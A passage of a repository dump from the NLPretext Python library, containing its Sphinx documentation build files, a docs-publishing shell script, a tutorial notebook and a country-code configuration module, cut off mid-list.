    "content": "# Minimal makefile for Sphinx documentation\n#\n\n# You can set these variables from the command line, and also\n# from the environment for the first two.\nSPHINXOPTS           ?=\nSPHINXBUILD          ?= poetry run sphinx-build\nSPHINXAPIBUILD       ?= poetry run sphinx-apidoc\nSPHINXMULTIVERSION   ?= poetry run sphinx-multiversion\nSOURCEDIR            = source\nBUILDDIR             = build\n\n# Put it first so that \"make\" without argument is like \"make help\".\n.PHONY: help Makefile\nhelp:\n\t@$(SPHINXBUILD) -M help \"$(SOURCEDIR)\" \"$(BUILDDIR)\" $(SPHINXOPTS) $(O)\n\nmultiversion:\n\t@$(SPHINXMULTIVERSION) $(SOURCEDIR) $(BUILDDIR)/html\n\napidoc:\n\t@$(SPHINXAPIBUILD) -f -o source/apidoc/ ../nlpretext/ --implicit-namespaces -M -t source/_templates\n\n# Catch-all target: route all unknown targets to Sphinx using the new\n# \"make mode\" option.  $(O) is meant as a shortcut for $(SPHINXOPTS).\n%: Makefile\n\t@$(SPHINXBUILD) -M $@ \"$(SOURCEDIR)\" \"$(BUILDDIR)\" $(SPHINXOPTS) $(O)\n"
  },
  {
    "path": "docs/make.bat",
    "content": "@ECHO OFF\n\nREM Command file for Sphinx documentation\n\nif \"%SPHINXBUILD%\" == \"\" (\n\tset SPHINXBUILD=sphinx-build\n)\nset BUILDDIR=build\nset ALLSPHINXOPTS=-d %BUILDDIR%/doctrees %SPHINXOPTS% .\nif NOT \"%PAPER%\" == \"\" (\n\tset ALLSPHINXOPTS=-D latex_paper_size=%PAPER% %ALLSPHINXOPTS%\n)\n\nif \"%1\" == \"\" goto help\n\nif \"%1\" == \"help\" (\n\t:help\n\techo.Please use `make ^<target^>` where ^<target^> is one of\n\techo.  html       to make standalone HTML files\n\techo.  dirhtml    to make HTML files named index.html in directories\n\techo.  singlehtml to make a single large HTML file\n\techo.  pickle     to make pickle files\n\techo.  json       to make JSON files\n\techo.  htmlhelp   to make HTML files and a HTML help project\n\techo.  qthelp     to make HTML files and a qthelp project\n\techo.  devhelp    to make HTML files and a Devhelp project\n\techo.  epub       to make an epub\n\techo.  latex      to make LaTeX files, you can set PAPER=a4 or PAPER=letter\n\techo.  text       to make text files\n\techo.  man        to make manual pages\n\techo.  changes    to make an overview over all changed/added/deprecated items\n\techo.  linkcheck  to check all external links for integrity\n\techo.  doctest    to run all doctests embedded in the documentation if enabled\n\tgoto end\n)\n\nif \"%1\" == \"clean\" (\n\tfor /d %%i in (%BUILDDIR%\\*) do rmdir /q /s %%i\n\tdel /q /s %BUILDDIR%\\*\n\tgoto end\n)\n\nif \"%1\" == \"html\" (\n\t%SPHINXBUILD% -b html %ALLSPHINXOPTS% %BUILDDIR%/html\n\techo.\n\techo.Build finished. The HTML pages are in %BUILDDIR%/html.\n\tgoto end\n)\n\nif \"%1\" == \"dirhtml\" (\n\t%SPHINXBUILD% -b dirhtml %ALLSPHINXOPTS% %BUILDDIR%/dirhtml\n\techo.\n\techo.Build finished. The HTML pages are in %BUILDDIR%/dirhtml.\n\tgoto end\n)\n\nif \"%1\" == \"singlehtml\" (\n\t%SPHINXBUILD% -b singlehtml %ALLSPHINXOPTS% %BUILDDIR%/singlehtml\n\techo.\n\techo.Build finished. 
The HTML pages are in %BUILDDIR%/singlehtml.\n\tgoto end\n)\n\nif \"%1\" == \"pickle\" (\n\t%SPHINXBUILD% -b pickle %ALLSPHINXOPTS% %BUILDDIR%/pickle\n\techo.\n\techo.Build finished; now you can process the pickle files.\n\tgoto end\n)\n\nif \"%1\" == \"json\" (\n\t%SPHINXBUILD% -b json %ALLSPHINXOPTS% %BUILDDIR%/json\n\techo.\n\techo.Build finished; now you can process the JSON files.\n\tgoto end\n)\n\nif \"%1\" == \"htmlhelp\" (\n\t%SPHINXBUILD% -b htmlhelp %ALLSPHINXOPTS% %BUILDDIR%/htmlhelp\n\techo.\n\techo.Build finished; now you can run HTML Help Workshop with the ^\n.hhp project file in %BUILDDIR%/htmlhelp.\n\tgoto end\n)\n\nif \"%1\" == \"qthelp\" (\n\t%SPHINXBUILD% -b qthelp %ALLSPHINXOPTS% %BUILDDIR%/qthelp\n\techo.\n\techo.Build finished; now you can run \"qcollectiongenerator\" with the ^\n.qhcp project file in %BUILDDIR%/qthelp, like this:\n\techo.^> qcollectiongenerator %BUILDDIR%\\qthelp\\Mapnik.qhcp\n\techo.To view the help file:\n\techo.^> assistant -collectionFile %BUILDDIR%\\qthelp\\Mapnik.ghc\n\tgoto end\n)\n\nif \"%1\" == \"devhelp\" (\n\t%SPHINXBUILD% -b devhelp %ALLSPHINXOPTS% %BUILDDIR%/devhelp\n\techo.\n\techo.Build finished.\n\tgoto end\n)\n\nif \"%1\" == \"epub\" (\n\t%SPHINXBUILD% -b epub %ALLSPHINXOPTS% %BUILDDIR%/epub\n\techo.\n\techo.Build finished. The epub file is in %BUILDDIR%/epub.\n\tgoto end\n)\n\nif \"%1\" == \"latex\" (\n\t%SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex\n\techo.\n\techo.Build finished; the LaTeX files are in %BUILDDIR%/latex.\n\tgoto end\n)\n\nif \"%1\" == \"text\" (\n\t%SPHINXBUILD% -b text %ALLSPHINXOPTS% %BUILDDIR%/text\n\techo.\n\techo.Build finished. The text files are in %BUILDDIR%/text.\n\tgoto end\n)\n\nif \"%1\" == \"man\" (\n\t%SPHINXBUILD% -b man %ALLSPHINXOPTS% %BUILDDIR%/man\n\techo.\n\techo.Build finished. 
The manual pages are in %BUILDDIR%/man.\n\tgoto end\n)\n\nif \"%1\" == \"changes\" (\n\t%SPHINXBUILD% -b changes %ALLSPHINXOPTS% %BUILDDIR%/changes\n\techo.\n\techo.The overview file is in %BUILDDIR%/changes.\n\tgoto end\n)\n\nif \"%1\" == \"linkcheck\" (\n\t%SPHINXBUILD% -b linkcheck %ALLSPHINXOPTS% %BUILDDIR%/linkcheck\n\techo.\n\techo.Link check complete; look for any errors in the above output ^\nor in %BUILDDIR%/linkcheck/output.txt.\n\tgoto end\n)\n\nif \"%1\" == \"doctest\" (\n\t%SPHINXBUILD% -b doctest %ALLSPHINXOPTS% %BUILDDIR%/doctest\n\techo.\n\techo.Testing of doctests in the sources finished, look at the ^\nresults in %BUILDDIR%/doctest/output.txt.\n\tgoto end\n)\n\n:end\n"
  },
  {
    "path": "docs/scripts/buildsite.sh",
    "content": "#!/bin/bash\n\nexport SOURCE_DATE_EPOCH=$(git log -1 --pretty=%ct)\n\n##############\n# BUILD DOCS #\n##############\n\n# Python Sphinx, configured with source/conf.py\n# See https://www.sphinx-doc.org/\n\ncd docs/\n\ncurrent_tag=$(git symbolic-ref -q --short HEAD || git describe --tags --exact-match)\ncurrent_tag_message=$(git cat-file -p $(git rev-parse $(git tag -l | tail -n1)) | tail -n +6)\n\nmake clean\nmake apidoc\ngit add .\ngit commit -m \"Commit needed for multiversioning\"\n\ngit pull --tags\ngit tag -a latest -m \"Latest version of the package\"\n\nmake multiversion\n\n#######################\n# Update GitHub Pages #\n#######################\n\ndocroot=`mktemp -d`\ncp -r build/html/* ${docroot}\n\ncd ..\n\ngit branch -d gh-pages\ngit checkout --orphan gh-pages\ngit rm --cached -r .\ngit clean -fdx\n\n# Adds .nojekyll file to the root to signal to GitHub that\n# directories that start with an underscore (_) can remain\ntouch .nojekyll\n\n# Add index.html\ncat > index.html <<EOF\n<!DOCTYPE html>\n<html>\n  <head>\n    <title>Redirecting to the latest release</title>\n    <meta charset=\"utf-8\">\n    <meta http-equiv=\"refresh\" content=\"0; url=./latest/index.html\">\n    <link rel=\"canonical\" href=\"./latest/index.html\">\n  </head>\n</html>\nEOF\n\n# Add README\ncat > README.md <<EOF\n# README for the GitHub Pages Branch\nThis branch is simply a cache for the website and is not intended to be viewed on github.com.\nEOF\n\n# Copy the resulting html pages built from Sphinx to the gh-pages branch\ncp -r ${docroot}/* .\n\ngit add .\n\n# Make a commit with changes and any new files\nmsg=\"Updating Docs for commit ${GITHUB_SHA} made on `date -d\"@${SOURCE_DATE_EPOCH}\" --iso-8601=seconds` from ${GITHUB_REF} by ${GITHUB_ACTOR}\"\ngit commit -m \"${msg}\"\n\n# overwrite the contents of the gh-pages branch on our github.com repo\ngit push origin gh-pages --force\n\n# exit cleanly\nexit 0\n"
  },
  {
    "path": "docs/source/_templates/module.rst_t",
    "content": "\n{%- if show_headings %}\n{{- [basename] | join(' ') | e | heading }}\n\n{% endif -%}\n.. automodule:: {{ qualname }}\n{%- for option in automodule_options %}\n   :{{ option }}:\n{%- endfor %}\n"
  },
  {
    "path": "docs/source/_templates/package.rst_t",
    "content": "\n{%- macro automodule(modname, options) -%}\n.. automodule:: {{ modname }}\n{%- for option in options %}\n   :{{ option }}:\n{%- endfor %}\n{%- endmacro %}\n\n{%- macro toctree(docnames) -%}\n.. toctree::\n   :maxdepth: {{ maxdepth }}\n{% for docname in docnames %}\n   {{ docname }}\n{%- endfor %}\n{%- endmacro %}\n\n{%- if is_namespace %}\n{{- [\"**\", pkgname, \"**\"] | join(\"\") | heading }}\n{% else %}\n{% set pkg_list = pkgname.split('.') %}\n{{- [\"**\", pkg_list[-1], \"**\"] | join(\"\") | heading }}\n{% endif %}\n\n{%- if modulefirst and not is_namespace %}\n{{ automodule(pkgname, automodule_options) }}\n{% endif %}\n\n{%- if subpackages %}\n\n{{ toctree(subpackages) }}\n{% endif %}\n\n{%- if submodules %}\n{% if separatemodules %}\n{{ toctree(submodules) }}\n{% else %}\n{%- for submodule in submodules %}\n{% if show_headings %}\n{% set submodule_list = submodule.split('.') %}\n{{- [submodule_list[-1]] | join(\" \") | e | heading(2) }}\n{% endif %}\n{{ automodule(submodule, automodule_options) }}\n{% endfor %}\n{%- endif %}\n{%- endif %}\n\n{%- if not modulefirst and not is_namespace %}\n\n{{ automodule(pkgname, automodule_options) }}\n{% endif %}\n"
  },
  {
    "path": "docs/source/_templates/versions.html",
    "content": "\n{%- if current_version %}\n<div class=\"rst-versions\" data-toggle=\"rst-versions\" role=\"note\" aria-label=\"versions\">\n  <span class=\"rst-current-version\" data-toggle=\"rst-current-version\">\n    <span class=\"fa fa-book\"> Other Versions</span>\n    v: {{ current_version.name }}\n    <span class=\"fa fa-caret-down\"></span>\n  </span>\n  <div class=\"rst-other-versions\">\n    {%- if versions.tags %}\n    <dl>\n      <dt>Tags</dt>\n      {%- for item in versions.tags %}\n      <dd><a href=\"{{ item.url }}\">{{ item.name }}</a></dd>\n      {%- endfor %}\n    </dl>\n    {%- endif %}\n    {%- if versions.branches %}\n    <dl>\n      <dt>Branches</dt>\n      {%- for item in versions.branches %}\n      <dd><a href=\"{{ item.url }}\">{{ item.name }}</a></dd>\n      {%- endfor %}\n    </dl>\n    {%- endif %}\n  </div>\n</div>\n{%- endif %}\n"
  },
  {
    "path": "docs/source/conf.py",
    "content": "# Configuration file for the Sphinx documentation builder.\n#\n# This file only contains a selection of the most common options. For a full\n# list see the documentation:\n# https://www.sphinx-doc.org/en/master/usage/configuration.html\n\n# -- Path setup --------------------------------------------------------------\n\n# If extensions (or modules to document with autodoc) are in another directory,\n# add these directories to sys.path here. If the directory is relative to the\n# documentation root, use os.path.abspath to make it absolute, like shown here.\n#\nimport os\nimport sys\n\nsys.path.insert(0, os.path.abspath(\"..\"))\n\n\n# -- Project information -----------------------------------------------------\n\nproject = \"nlpretext\"\nauthor = \"artefactory\"\n\n# -- General configuration ---------------------------------------------------\n\n# Add any Sphinx extension module names here, as strings. They can be\n# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom\n# ones.\nextensions = [\n    \"sphinx.ext.autodoc\",\n    \"sphinx.ext.autosummary\",\n    \"sphinx.ext.intersphinx\",\n    \"sphinx.ext.mathjax\",\n    \"sphinx.ext.napoleon\",\n    \"sphinx.ext.todo\",\n    \"sphinx.ext.viewcode\",\n    \"recommonmark\",\n    \"nbsphinx\",\n    \"sphinx_multiversion\",\n    \"sphinx_autodoc_typehints\",\n    \"sphinx_rtd_theme\",\n]\n\nsource_suffix = {\n    \".rst\": \"restructuredtext\",\n    \".txt\": \"restructuredtext\",\n    \".md\": \"markdown\",\n}\n\nsource_parsers = {\".md\": \"recommonmark.parser.CommonMarkParser\"}\n\nnbsphinx_execute = \"never\"\n\ngithub_url = \"https://github.com/artefactory/NLPretext\"\n\nsmv_prefer_remote_refs = False\nsmv_remote_whitelist = None\nsmv_prebuild_command = (\n    \"poetry run sphinx-apidoc -f -o source/apidoc/ \"\n    \"../nlpretext/ \"\n    \"--implicit-namespaces -M -t source/_templates\"\n)\n\n# Add any paths that contain templates here, relative to this directory.\ntemplates_path = 
[\"_templates\"]\n\n# Autodoc parameters\nalways_document_param_types = True\nadd_module_names = False\nautodoc_member_order = \"bysource\"\n\n# -- Options for HTML output -------------------------------------------------\n\n# The theme to use for HTML and HTML Help pages.  See the documentation for\n# a list of builtin themes.\n\nhtml_theme = \"sphinx_rtd_theme\"\n\ngithub_url = \"https://www.github.com/artefactory/NLPretext}\"\n\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\nhtml_static_path = [\"_static\"]\n\n# -- Options for LaTeX output ------------------------------------------------\n\nlatex_elements = {\n    # Font packages\n    \"fontpkg\": \"\\\\usepackage{amsmath, amsfonts, amssymb, amsthm}\"\n}\n"
  },
  {
    "path": "docs/source/index.rst",
    "content": "=========\nNLPretext\n=========\n\n\nWelcome to NLPretext's documentation!\n========================================\n\nThe NLPretext library aimed to be a meta-library to be used to help you get started on handling your NLP use-case preprocessing.\n\n\n# Installation\n\nBeware, this package has been tested on Python `3.8`, `3.9` & `3.10` and will probably not be working under python **2.7** as **Python2.7** EOL is scheduled for December 2019.\n\nTo install this library you should first clone the repository:\n\npip install nlpretext\n\n\n.. toctree::\n    :maxdepth: 4\n    :caption: Tutorials:\n\n    ./tutorials/index\n\n.. toctree::\n    :maxdepth: 2\n    :caption: API Reference:\n\n    ./apidoc/modules\n\nIndices and tables\n==================\n\n* :ref:`genindex`\n* :ref:`modindex`\n* :ref:`search`\n"
  },
  {
    "path": "docs/source/tutorials/basic_notebook.ipynb",
    "content": "{\n \"cells\": [\n  {\n   \"cell_type\": \"markdown\",\n   \"metadata\": {},\n   \"source\": [\n    \"# How to use the package in a notebook\\n\",\n    \"\\n\",\n    \"<div align=\\\"center\\\">\\n\",\n    \"\\n\",\n    \"<div style=\\\"width: 25%; min-width: 150px; padding: 20px\\\">\\n\",\n    \"\\n\",\n    \"![Python Logo](../_static/images/python_logo.png)\\n\",\n    \"\\n\",\n    \"</div>\\n\",\n    \"\\n\",\n    \"### *nlpretext*\\n\",\n    \"\\n\",\n    \"</div>\\n\",\n    \"\\n\",\n    \"## Installing from the main branch\\n\",\n    \"\\n\",\n    \"To install the library from the main branch, you can run the following cell :\"\n   ]\n  },\n  {\n   \"cell_type\": \"code\",\n   \"execution_count\": null,\n   \"metadata\": {\n    \"pycharm\": {\n     \"name\": \"#%%\\n\"\n    }\n   },\n   \"outputs\": [],\n   \"source\": [\n    \"%pip install git+ssh://git@github.com/artefactory/NLPretext.git@main\"\n   ]\n  },\n  {\n   \"cell_type\": \"markdown\",\n   \"metadata\": {},\n   \"source\": [\n    \"## Installing from a specific release\\n\",\n    \"\\n\",\n    \"To install the library from a specific release, you can run the following cell :\"\n   ]\n  },\n  {\n   \"cell_type\": \"code\",\n   \"execution_count\": null,\n   \"metadata\": {\n    \"pycharm\": {\n     \"name\": \"#%%\\n\"\n    }\n   },\n   \"outputs\": [],\n   \"source\": [\n    \"%pip install git+ssh://git@github.com/artefactory/NLPretext.git@v1.0.5\"\n   ]\n  },\n  {\n   \"cell_type\": \"markdown\",\n   \"metadata\": {},\n   \"source\": [\n    \"## Using the package\\n\",\n    \"\\n\",\n    \"You can now import and run whatever is in the package :\"\n   ]\n  },\n  {\n   \"cell_type\": \"code\",\n   \"execution_count\": null,\n   \"metadata\": {\n    \"pycharm\": {\n     \"name\": \"#%%\\n\"\n    }\n   },\n   \"outputs\": [],\n   \"source\": [\n    \"from nlpretext.basic.preprocess import replace_emails\\n\",\n    \"\\n\",\n    \"example = \\\"I have forwarded this email to 
obama@whitehouse.gov\\\"\\n\",\n    \"example = replace_emails(example, replace_with=\\\"*EMAIL*\\\")\"\n   ]\n  },\n  {\n   \"cell_type\": \"code\",\n   \"execution_count\": null,\n   \"metadata\": {\n    \"pycharm\": {\n     \"name\": \"#%%\\n\"\n    }\n   },\n   \"outputs\": [],\n   \"source\": [\n    \"print(example)\"\n   ]\n  }\n ],\n \"metadata\": {\n  \"kernelspec\": {\n   \"display_name\": \"Python 3\",\n   \"language\": \"python\",\n   \"name\": \"python3\"\n  },\n  \"language_info\": {\n   \"codemirror_mode\": {\n    \"name\": \"ipython\",\n    \"version\": 3\n   },\n   \"file_extension\": \".py\",\n   \"mimetype\": \"text/x-python\",\n   \"name\": \"python\",\n   \"nbconvert_exporter\": \"python\",\n   \"pygments_lexer\": \"ipython3\",\n   \"version\": \"3.7.9\"\n  }\n },\n \"nbformat\": 4,\n \"nbformat_minor\": 1\n}\n"
  },
  {
    "path": "docs/source/tutorials/index.rst",
    "content": "Tutorials\n=========\n\n\n.. toctree::\n    :maxdepth: 4\n    :glob:\n\n    basic_notebook\n"
  },
  {
    "path": "nlpretext/__init__.py",
    "content": "# GNU Lesser General Public License v3.0 only\n# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 3 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.\n\n# mypy: disable-error-code=\"attr-defined\"\n# mypy: disable-error-code=\"assignment\"\n\n\"\"\"All the goto functions you need to handle NLP use-cases, integrated in NLPretext.\"\"\"\n\nfrom importlib.metadata import PackageNotFoundError, version\n\nfrom nlpretext.preprocessor import Preprocessor\n\ntry:\n    __version__ = version(__name__)\nexcept PackageNotFoundError:  # pragma: no cover\n    __version__ = \"unknown\"\n\n\n__all__ = [\"Preprocessor\"]\n"
  },
  {
    "path": "nlpretext/_config/__init__.py",
    "content": "# GNU Lesser General Public License v3.0 only\n# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 3 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.\n"
  },
  {
    "path": "nlpretext/_config/config.py",
    "content": "# GNU Lesser General Public License v3.0 only\n# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 3 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.\n#!/usr/local/bin/python3\nfrom typing import List, Optional\n\nimport os\n\nimport phonenumbers as _phonenumbers\n\nROOT_FOLDER = os.path.abspath(os.path.join(os.path.dirname(__file__), \"../..\"))\n\n# Country config\nCOUNTRY_MAPPING_ISO = {\n    \"af\": \"Afghanistan\",\n    \"ax\": \"Åland Islands\",\n    \"al\": \"Albania\",\n    \"dz\": \"Algeria\",\n    \"as\": \"American Samoa\",\n    \"ad\": \"Andorra\",\n    \"ao\": \"Angola\",\n    \"ai\": \"Anguilla\",\n    \"aq\": \"Antarctica\",\n    \"ag\": \"Antigua and Barbuda\",\n    \"ar\": \"Argentina\",\n    \"am\": \"Armenia\",\n    \"aw\": \"Aruba\",\n    \"au\": \"Australia\",\n    \"at\": \"Austria\",\n    \"az\": \"Azerbaijan\",\n    \"bs\": \"Bahamas\",\n    \"bh\": \"Bahrain\",\n    \"bd\": \"Bangladesh\",\n    \"bb\": \"Barbados\",\n    \"by\": \"Belarus\",\n    \"be\": \"Belgium\",\n    \"bz\": \"Belize\",\n    \"bj\": \"Benin\",\n    \"bm\": \"Bermuda\",\n    \"bt\": \"Bhutan\",\n    \"bo\": \"Bolivia (Plurinational State of)\",\n    \"bq\": \"Bonaire, Sint Eustatius and Saba\",\n    \"ba\": \"Bosnia and Herzegovina\",\n    \"bw\": 
\"Botswana\",\n    \"bv\": \"Bouvet Island\",\n    \"br\": \"Brazil\",\n    \"io\": \"British Indian Ocean Territory\",\n    \"bn\": \"Brunei Darussalam\",\n    \"bg\": \"Bulgaria\",\n    \"bf\": \"Burkina Faso\",\n    \"bi\": \"Burundi\",\n    \"cv\": \"Cabo Verde\",\n    \"kh\": \"Cambodia\",\n    \"cm\": \"Cameroon\",\n    \"ca\": \"Canada\",\n    \"ky\": \"Cayman Islands\",\n    \"cf\": \"Central African Republic\",\n    \"td\": \"Chad\",\n    \"cl\": \"Chile\",\n    \"cn\": \"China\",\n    \"cx\": \"Christmas Island\",\n    \"cc\": \"Cocos (Keeling) Islands\",\n    \"co\": \"Colombia\",\n    \"km\": \"Comoros\",\n    \"cg\": \"Congo\",\n    \"cd\": \"Congo, Democratic Republic of the\",\n    \"ck\": \"Cook Islands\",\n    \"cr\": \"Costa Rica\",\n    \"ci\": \"Côte d'Ivoire\",\n    \"hr\": \"Croatia\",\n    \"cu\": \"Cuba\",\n    \"cw\": \"Curaçao\",\n    \"cy\": \"Cyprus\",\n    \"cz\": \"Czechia\",\n    \"dk\": \"Denmark\",\n    \"dj\": \"Djibouti\",\n    \"dm\": \"Dominica\",\n    \"do\": \"Dominican Republic\",\n    \"ec\": \"Ecuador\",\n    \"eg\": \"Egypt\",\n    \"sv\": \"El Salvador\",\n    \"gq\": \"Equatorial Guinea\",\n    \"er\": \"Eritrea\",\n    \"ee\": \"Estonia\",\n    \"sz\": \"Eswatini\",\n    \"et\": \"Ethiopia\",\n    \"fk\": \"Falkland Islands (Malvinas)\",\n    \"fo\": \"Faroe Islands\",\n    \"fj\": \"Fiji\",\n    \"fi\": \"Finland\",\n    \"fr\": \"France\",\n    \"gf\": \"French Guiana\",\n    \"pf\": \"French Polynesia\",\n    \"tf\": \"French Southern Territories\",\n    \"ga\": \"Gabon\",\n    \"gm\": \"Gambia\",\n    \"ge\": \"Georgia\",\n    \"de\": \"Germany\",\n    \"gh\": \"Ghana\",\n    \"gi\": \"Gibraltar\",\n    \"gr\": \"Greece\",\n    \"gl\": \"Greenland\",\n    \"gd\": \"Grenada\",\n    \"gp\": \"Guadeloupe\",\n    \"gu\": \"Guam\",\n    \"gt\": \"Guatemala\",\n    \"gg\": \"Guernsey\",\n    \"gn\": \"Guinea\",\n    \"gw\": \"Guinea-Bissau\",\n    \"gy\": \"Guyana\",\n    \"ht\": \"Haiti\",\n    \"hm\": \"Heard Island and 
McDonald Islands\",\n    \"va\": \"Holy See\",\n    \"hn\": \"Honduras\",\n    \"hk\": \"Hong Kong\",\n    \"hu\": \"Hungary\",\n    \"is\": \"Iceland\",\n    \"in\": \"India\",\n    \"id\": \"Indonesia\",\n    \"ir\": \"Iran (Islamic Republic of)\",\n    \"iq\": \"Iraq\",\n    \"ie\": \"Ireland\",\n    \"im\": \"Isle of Man\",\n    \"il\": \"Israel\",\n    \"it\": \"Italy\",\n    \"jm\": \"Jamaica\",\n    \"jp\": \"Japan\",\n    \"je\": \"Jersey\",\n    \"jo\": \"Jordan\",\n    \"kz\": \"Kazakhstan\",\n    \"ke\": \"Kenya\",\n    \"ki\": \"Kiribati\",\n    \"kp\": \"Korea (Democratic People's Republic of)\",\n    \"kr\": \"Korea, Republic of\",\n    \"kw\": \"Kuwait\",\n    \"kg\": \"Kyrgyzstan\",\n    \"la\": \"Lao People's Democratic Republic\",\n    \"lv\": \"Latvia\",\n    \"lb\": \"Lebanon\",\n    \"ls\": \"Lesotho\",\n    \"lr\": \"Liberia\",\n    \"ly\": \"Libya\",\n    \"li\": \"Liechtenstein\",\n    \"lt\": \"Lithuania\",\n    \"lu\": \"Luxembourg\",\n    \"mo\": \"Macao\",\n    \"mg\": \"Madagascar\",\n    \"mw\": \"Malawi\",\n    \"my\": \"Malaysia\",\n    \"mv\": \"Maldives\",\n    \"ml\": \"Mali\",\n    \"mt\": \"Malta\",\n    \"mh\": \"Marshall Islands\",\n    \"mq\": \"Martinique\",\n    \"mr\": \"Mauritania\",\n    \"mu\": \"Mauritius\",\n    \"yt\": \"Mayotte\",\n    \"mx\": \"Mexico\",\n    \"fm\": \"Micronesia (Federated States of)\",\n    \"md\": \"Moldova, Republic of\",\n    \"mc\": \"Monaco\",\n    \"mn\": \"Mongolia\",\n    \"me\": \"Montenegro\",\n    \"ms\": \"Montserrat\",\n    \"ma\": \"Morocco\",\n    \"mz\": \"Mozambique\",\n    \"mm\": \"Myanmar\",\n    \"na\": \"Namibia\",\n    \"nr\": \"Nauru\",\n    \"np\": \"Nepal\",\n    \"nl\": \"Netherlands\",\n    \"nc\": \"New Caledonia\",\n    \"nz\": \"New Zealand\",\n    \"ni\": \"Nicaragua\",\n    \"ne\": \"Niger\",\n    \"ng\": \"Nigeria\",\n    \"nu\": \"Niue\",\n    \"nf\": \"Norfolk Island\",\n    \"mk\": \"North Macedonia\",\n    \"mp\": \"Northern Mariana Islands\",\n    \"no\": 
\"Norway\",\n    \"om\": \"Oman\",\n    \"pk\": \"Pakistan\",\n    \"pw\": \"Palau\",\n    \"ps\": \"Palestine, State of\",\n    \"pa\": \"Panama\",\n    \"pg\": \"Papua New Guinea\",\n    \"py\": \"Paraguay\",\n    \"pe\": \"Peru\",\n    \"ph\": \"Philippines\",\n    \"pn\": \"Pitcairn\",\n    \"pl\": \"Poland\",\n    \"pt\": \"Portugal\",\n    \"pr\": \"Puerto Rico\",\n    \"qa\": \"Qatar\",\n    \"re\": \"Réunion\",\n    \"ro\": \"Romania\",\n    \"ru\": \"Russian Federation\",\n    \"rw\": \"Rwanda\",\n    \"bl\": \"Saint Barthélemy\",\n    \"sh\": \"Saint Helena, Ascension and Tristan da Cunha\",\n    \"kn\": \"Saint Kitts and Nevis\",\n    \"lc\": \"Saint Lucia\",\n    \"mf\": \"Saint Martin (French part)\",\n    \"pm\": \"Saint Pierre and Miquelon\",\n    \"vc\": \"Saint Vincent and the Grenadines\",\n    \"ws\": \"Samoa\",\n    \"sm\": \"San Marino\",\n    \"st\": \"Sao Tome and Principe\",\n    \"sa\": \"Saudi Arabia\",\n    \"sn\": \"Senegal\",\n    \"rs\": \"Serbia\",\n    \"sc\": \"Seychelles\",\n    \"sl\": \"Sierra Leone\",\n    \"sg\": \"Singapore\",\n    \"sx\": \"Sint Maarten (Dutch part)\",\n    \"sk\": \"Slovakia\",\n    \"si\": \"Slovenia\",\n    \"sb\": \"Solomon Islands\",\n    \"so\": \"Somalia\",\n    \"za\": \"South Africa\",\n    \"gs\": \"South Georgia and the South Sandwich Islands\",\n    \"ss\": \"South Sudan\",\n    \"es\": \"Spain\",\n    \"lk\": \"Sri Lanka\",\n    \"sd\": \"Sudan\",\n    \"sr\": \"Suriname\",\n    \"sj\": \"Svalbard and Jan Mayen\",\n    \"se\": \"Sweden\",\n    \"ch\": \"Switzerland\",\n    \"sy\": \"Syrian Arab Republic\",\n    \"tw\": \"Taiwan, Province of China\",\n    \"tj\": \"Tajikistan\",\n    \"tz\": \"Tanzania, United Republic of\",\n    \"th\": \"Thailand\",\n    \"tl\": \"Timor-Leste\",\n    \"tg\": \"Togo\",\n    \"tk\": \"Tokelau\",\n    \"to\": \"Tonga\",\n    \"tt\": \"Trinidad and Tobago\",\n    \"tn\": \"Tunisia\",\n    \"tr\": \"Turkey\",\n    \"tm\": \"Turkmenistan\",\n    \"tc\": \"Turks and 
Caicos Islands\",\n    \"tv\": \"Tuvalu\",\n    \"ug\": \"Uganda\",\n    \"ua\": \"Ukraine\",\n    \"ae\": \"United Arab Emirates\",\n    \"gb\": \"United Kingdom of Great Britain and Northern Ireland\",\n    \"us\": \"United States of America\",\n    \"um\": \"United States Minor Outlying Islands\",\n    \"uy\": \"Uruguay\",\n    \"uz\": \"Uzbekistan\",\n    \"vu\": \"Vanuatu\",\n    \"ve\": \"Venezuela (Bolivarian Republic of)\",\n    \"vn\": \"Viet Nam\",\n    \"vg\": \"Virgin Islands (British)\",\n    \"vi\": \"Virgin Islands (U.S.)\",\n    \"wf\": \"Wallis and Futuna\",\n    \"eh\": \"Western Sahara\",\n    \"ye\": \"Yemen\",\n    \"zm\": \"Zambia\",\n    \"zw\": \"Zimbabwe\",\n}\n\n# Phone numbers config\nSUPPORTED_COUNTRY: List[Optional[str]] = [\n    None,\n    \"US\",\n    \"AG\",\n    \"AI\",\n    \"AS\",\n    \"BB\",\n    \"BM\",\n    \"BS\",\n    \"CA\",\n    \"DM\",\n    \"GD\",\n    \"GU\",\n    